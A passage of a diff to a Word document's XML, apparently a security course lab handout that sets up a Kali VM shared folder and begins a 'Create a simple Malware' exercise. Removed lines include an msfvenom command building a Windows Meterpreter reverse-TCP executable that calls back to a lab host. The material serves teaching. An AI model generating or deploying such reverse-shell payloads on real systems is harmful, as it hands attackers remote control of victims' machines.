+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4457700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CF2D616" wp14:editId="78C1215E">
+            <wp:extent cx="5943600" cy="4457700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1795725192" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 10"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4457700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1088,40 +1611,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1131,24 +1633,23 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1157,467 +1658,12 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Go to ‘Machine-&gt;Settings-&gt;Shared Folders’ in the VirtualBox menu of your Kali VM. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Add a new shared folder, and:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Choose the host path of the shared folder in the ‘Folder Path’ field. This will be the path on your host device.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Name your new folder as “CSE434S-Kali-Shared” .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Select both ‘Auto-mount’, and ‘Make Permanent’ .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Name the guest folder name “CSE434S-share” in ‘Mount point’ field. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Open a terminal in the Kali VM, and go to /media/sf_CSE434S-share.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>If you do not have access to the shared folder, try ‘</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>adduser</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $USER </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>vboxsf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">’ to add yourself to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>vboxsf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> group. You may have to log out and log in again to see the changes. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Create a new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> file (you can use  the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:i w:val="1"/>
-          <w:iCs w:val="1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">‘touch’ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">command)  and verify that you can see the file in your host machine. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Please take a screenshot of your created file as seen on both the Kali VM and the host machine and include the screenshots here.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>===============================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>PASTE SCREENSHOTS HERE:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>===============================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Part 4: Create a simple Malware</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>In this section, we will generate a simple malware attack to make sure that our environment is ready.</w:t>
-      </w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1625,20 +1671,19 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
         </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Open a terminal in your Kali VM, and create a new directory named ‘malware’ .</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Go to ‘Machine-&gt;Settings-&gt;Shared Folders’ in the VirtualBox menu of your Kali VM. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1647,103 +1692,141 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
         </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Type:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msfvenom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -p windows/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> LHOST=10.0.0.1 -f exe &gt; malware/test-malware.exe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
